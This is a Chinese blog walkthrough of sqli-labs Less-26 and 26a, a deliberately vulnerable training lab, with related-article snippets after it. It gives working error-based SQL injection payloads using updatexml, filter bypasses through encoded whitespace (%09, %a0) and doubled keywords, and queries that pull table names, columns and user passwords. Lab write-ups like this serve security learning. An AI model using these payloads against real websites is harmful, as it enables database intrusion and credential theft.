sqli-labs第二十六二十六a关

最新推荐文章于 2023-08-04 15:57:47 发布
最新推荐文章于 2023-08-04 15:57:47 发布
阅读量370 收藏 2
点赞数 1
分类专栏: sqli-labs 文章标签: sql 网络 安全 网络安全 web安全 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73248913/article/details/129148734
版权

这关油条加你的可以试试linux搭建sqlilabs这样比较简单。

需要注意的

本关可能有的朋友在 windows 下无法使用一些特殊的字符代替空格,此处是因为 apache 的解析的问题,这里请更换到 linux 平台下。

本关结合 25 关,将空格,or,and,/*,#,--,/等各种符号过滤,此处对于 and,or 的处理方法不再赘述,参考 25.此处我们需要说明两方面:对于注释和结尾字符的我们此处只能利用构造一个 ’ 来闭合后面到 ’ ;对于空格,有较多的方法:

  • %09 TAB 键(水平)

  • %0a 新建一行

  • %0c 新的一页

  • %0d return 功能

  • %0b TAB 键(垂直)

  • %a0 空

Less-26(GET - Error based - All your SPACES and COMMENTS belong to us)

手工注入

这里我就用windows来完成了,使用的是报错注入。

?id=1'--+
?id=1'#
?id=1' OR 1 = 1--+
?id=1' AND 1 = 1--+
?id=1'/*
?id=1'/
?id=1'\

这些全部被过滤了。

但是单引号没有过滤,下面能清晰看到单引号的存在。

看来我们只能利用逻辑来绕过了。

?id=-1' || 1 = 1  || '

查询数据库名

?id=-1' || updatexml(1,concat(0x7e,database()),1) || '1'='1

查询表名

?id=1' || updatexml(1, concat(0x7e, (SELECT (group_concat(table_name)) FROM (infoorrmation_schema.tables) WHERE (table_schema=database()))) ,1) || '1'='1

查询列名

?id=1'||updatexml(1,concat(1,(SELECT (group_concat(column_name)) FROM (infoorrmation_schema.columns) WHERE (table_schema='security' %26%26 table_name = 'users'))) ,1) || '1'='1

查询数据

?id=-1' || updatexml(1,concat(0x0a,(SELECT(group_concat(concat_ws(0x3a,username,passwoorrd))) FROM (security.users) WHERE (id = 1) ))  ,1) || '1'='1

这次能查到数据。

自动化脚本注入工具

和之前是一样的

(2条消息) sqli-labs第一二关_himobrinehacken的博客-CSDN博客

Less-26a(GET - Error based - All your SPACES and COMMENTS belong to us - string single quuotes - Parenthrsis)

手工注入

和上一关一样,只是做了注释报错的操作,可以当成盲注解决。

(2条消息) sqli-labs第五六关_himobrinehacken的博客-CSDN博客

自动化脚本注入

和上一关一样

(2条消息) sqli-labs第一二关_himobrinehacken的博客-CSDN博客
himobrinehacken
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs(26a)
weixin_30920853的博客
05-28 697
0x01偷偷看一波源码 和26一样 闭合变成了’)而已 0X01构造语句爆库名 这是百度到的 第一个 ' 首先闭合id='$id' 中的',%a0是空格的意思,(ps:此处我的环境是ubuntu14.04+apache+mysql+php,可以解析%a0,此前在windows+wamp测试,不能解析%a0,有知情的请告知。)同时%0b也是可以通过测试的,其他的经测试是不行的。||是或者...
SQLi LABS Less 26a 联合注入+布尔盲注
热门推荐
wangyuxiang946的博客
08-15 1万+
SQLi 第26aSQLi-LABS Less-26a,SQLi-LABS Less 26a,SQLiLABS Less26a,SQLi Less 26a
sqli-labs 26a
weixin_47300936的博客
09-04 615
mysql会将'2'当作true,然后true and true为true,true则为1。执行的语句则是where id = '2' and '1'='1'执行的语句则是where id = ('2' and '1'='1')后面依次判断出字段名为id,username,password。,查询语句即为where id = ('$id'),查询语句即为where id = '$id'由图可知,回显id为1的信息,即闭合为')即2' and '1'='1。回显会是id为2的信息。回显会是id为1的信息。
SqliLabs Less26-26a
qq_45785324的博客
07-20 618
SqliLabs Less26 Less26a
sqli-labs ————less -26a
Fly_鹏程万里
05-16 998
Less-26a查看一下源代码:查询语句:$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";过滤机制:function blacklist($id) { $id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive) $id= preg_replace(...
422926799#note#sqli-labs第三十六1
07-25
sqli-labs Less 36代码如下:Less-36 Bypass MySQL Real Escape String//logging the conn
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
windows环境下安装sqli-labs
11-04
windows server 2012 环境下,安装sqli-labs的详细教程,适合新手小白,大神可以参考一下,有不足的地方请联系我。
jeakinscheung-sqli-labs-php7-master.zip
03-16
sqli创建数据库连接发现连接不了,这种原因是现在大部分人用的php7,原版的sqli只支持php5.
sqli-labs】 less26a GET- Blind based -All you SPACES and COMMENTS belong to us -String-single quotes...
ajxi63204的博客
01-28 174
这个和less26差不多,空格还是用%a0代替,26过了这个也就简单了 ;%00 可以代替注释,尝试一下 order by 3 http://192.168.136.128/sqli-labs-master/Less-26a/?id=1')%a0oorrder%a0by%a03;%00 order by 4 http://192.168.136.128/s...
sqli-labs/Less-26a
m0_71299382的博客
11-20 259
sqli-labs第二十六a
sql-labs闯26~31
qq_44663230的博客
09-03 2213
sql-labs闯26-28a 29~31暂时不做
Sqlilabs Less-26-26a Trick with spaces and comments
baynk的博客
03-31 464
Sqlilabs Less-26 Trick with spaces and comments with single quote 手工注入 加quote报错,然后注释没效果,给出的提示看起来似乎是被过滤掉了,用之前手法闭合。然后发现and好像也被过滤了,继续双写试试,但是结果好像空格也被过滤了。。。用了各种编码都不行后,查了资料发现用%a0或者%0b替代(%a0好像是不间断空格,会在html显示...
sqli-labs:less-26a(过滤了空格和注释,不能报错注入)
羽的博客
09-14 316
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; char...
sqli-labs: Less 21-65 通教程
qq_45756971的博客
10-27 374
第二十一: cookie注入 YOUR COOKIE : uname = RHVtYg== and expires: Sat 16 Jul 2016 - 08:32:26 注: RHVtYg== 是 Dumb 经Base64加密后的值 和上又是差不多 base64编码而已 payload: ') or 1=1 # Jykgb3IgMT0xICM= 第二十二: 闭合为双引号 参考21. 第二十三: 过滤了注释符号 而已 $reg = "/#/"; $reg1 = "/--/"; $repla
sqli-labs第26~28
yuqnqi的博客
05-13 370
查看源码黑名单,过滤了 or,and , /* , – , # , 空格 , /\s 代表中的一个空白字符(可能是空格、、其他空白) 即 \s 用于匹配空白字符。我们常见的绕过空格的就是多行注释,/**/但这里过滤了,不太行啊将空格,or,and,/*,#,--,/等各种符号过滤,此处对于and,or的处理方法不再赘述,参考25.此处我们需要说明两方面:对于注释和结尾字符的我们此处只能利用构造一个 ' 来闭合后面到 ';对于空格,有较多的方法:%09 TAB键(水平)%0a 新建一行。
Sqli-labs之Less-26和Less-26a
→_→
04-22 915
Less-26 GET-基于错误-您所有的空格和注释都属于我们 待续
SQL-labs的第26a——空格和注释被过滤 延时盲注(Get)
最新发布
qq_73393033的博客
08-04 189
注意该的or和and也被过滤了。
sqli-labs第二
07-28
回答: SQLI-LABS第二是一个显错注入的数字型不闭合的挑战。在这个挑战中,通过分析后端PHP源码,我们可以看到核心语句是`$sql="SELECT * FROM users WHERE id= $id ;`。与前一相比,这里的闭合方式不同,没有使用单引号将$id包围起来。\[1\] 为了获取users表的列名,我们可以使用注入语句`?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'`。这个语句利用了UNION操作符和information_schema表来获取列名。\[2\] 通过判断报错信息,我们可以初步确定存在注入点,并且判断出注入点类型为数字型注入。我们还可以猜测出当前表中的列数为3,并确定数据显示位置为2和3。进一步进行信息收集,我们可以得到数据库名为security,数据库版本为5.7.26,操作系统版本为Win64,数据库用户名为root@localhost,数据库路径为E:\site\phpStudy_64\phpstudy_pro\Extensions\MySQL5.7.26\data\。通过指定数据库,我们可以获取库中的表名,得到的表名为emails、referers、uagents和users。然后,通过指定表,我们可以获取表中的列名,得到的列名为id、username和password。最终,我们可以获取到username和password的数据。\[3\] 希望以上信息对你有所帮助! #### 引用[.reference_title] - *1* [SQLI-LABS 02.第二 【显错注入_数字型不闭合】](https://blog.csdn.net/weixin_45284414/article/details/130685057)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [sqli-labs第二](https://blog.csdn.net/weixin_45633277/article/details/122371405)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [sqli-labs----第二](https://blog.csdn.net/wyzhxhn/article/details/127700962)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

himobrinehacken

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值